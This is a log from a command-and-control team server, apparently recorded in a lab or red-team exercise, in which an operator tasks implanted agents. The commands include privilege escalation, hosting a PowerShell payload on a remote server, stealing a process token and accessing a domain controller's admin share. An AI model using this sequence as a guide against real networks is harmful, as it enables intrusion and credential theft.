20/06/2023 02:17:34 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b |  | Connexion to TeamServer
20/06/2023 02:17:35 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b |  | Connexion to TeamServer
20/06/2023 02:17:36 | Info | Agent | 48f1b07f57 |  | Agent Checking In
20/06/2023 02:18:11 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 48f1b07f57 | Command tasked to agent : elevate -i
20/06/2023 02:19:29 | Info | Agent | f1b5eabbe6 |  | Agent Checking In
20/06/2023 02:20:16 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | f1b5eabbe6 | Command tasked to agent : shell whoami
20/06/2023 02:21:17 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | f1b5eabbe6 | Command tasked to agent : shell whoami
20/06/2023 02:21:45 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | f1b5eabbe6 | Command tasked to agent : shell dir
20/06/2023 02:23:47 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | f1b5eabbe6 | Command tasked to agent : ls
20/06/2023 02:24:08 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 48f1b07f57 | Command tasked to agent : ls
20/06/2023 02:24:37 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b |  | Web hosting z - Payload PowerShell x64 https://192.168.56.129:443
20/06/2023 02:25:07 | Info | Agent | 93b57554ac |  | Agent Checking In
20/06/2023 02:25:11 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 93b57554ac | Command tasked to agent : ls
20/06/2023 02:25:20 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 93b57554ac | Command tasked to agent : shell whoami
20/06/2023 02:25:43 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 93b57554ac | Command tasked to agent : shell dir \\corp-dc.corp.local\c$
20/06/2023 02:26:06 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 93b57554ac | Command tasked to agent : ps cmd
20/06/2023 02:26:28 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 93b57554ac | Command tasked to agent : steal-token 11640
20/06/2023 02:26:45 | Info | User | Fropops-6b90dd74-4d7a-46f2-8e96-375ea850315b | 93b57554ac | Command tasked to agent : shell dir \\corp-dc.corp.local\c$
